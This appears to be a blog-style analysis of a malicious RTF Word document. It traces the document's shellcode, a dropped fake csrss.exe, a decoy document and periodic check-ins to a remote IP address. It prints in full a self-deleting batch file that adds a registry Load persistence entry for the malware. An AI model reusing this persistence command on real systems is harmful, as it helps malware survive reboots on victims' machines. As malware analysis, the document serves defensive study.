The .doc file contain Rich Text Format (RTF) encoding format and we can see a lot of 0x41 slide until we found the exact shellcode within the slide character. Below show you the location of the exploit code in hex format:
As I convert the hex format to binary, we can see some interesting strings. I'm not sure why its trying to execute ping command to localhost. Well, after execute the malicious .doc file. It will create a file named csrss.exe (921C724CCB04B9F672B294FFFF83CE7B) and execute it then rename it to 'winword.exe'. Then it will launch the cmd.exe to execute the ping command to 127.0.0.1 with 1 byte. After that, the malware will execute a clean Word.doc file.
The running csrss.exe will create the Update.bat on user StartMenu startup folder with the following content:
The batch command file will add a startup into user Windows registry pointing to csrss.exe located in user temporary folder. Then, lets take a look through packet capture:
Echo off REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Load /t REG_SZ /d "C:\DOCUME~1\User\LOCALS~1\Temp\csrss.exe" /f del %%0
The captured packet show that the malicious file attempt to POST request to the following URL:
IP Addess: 22.214.171.124
The IP address was originated from China and still active at the time I was writing these. The csrss.exe will keep running on memory and sleep for every 60 second and check back to the given URL.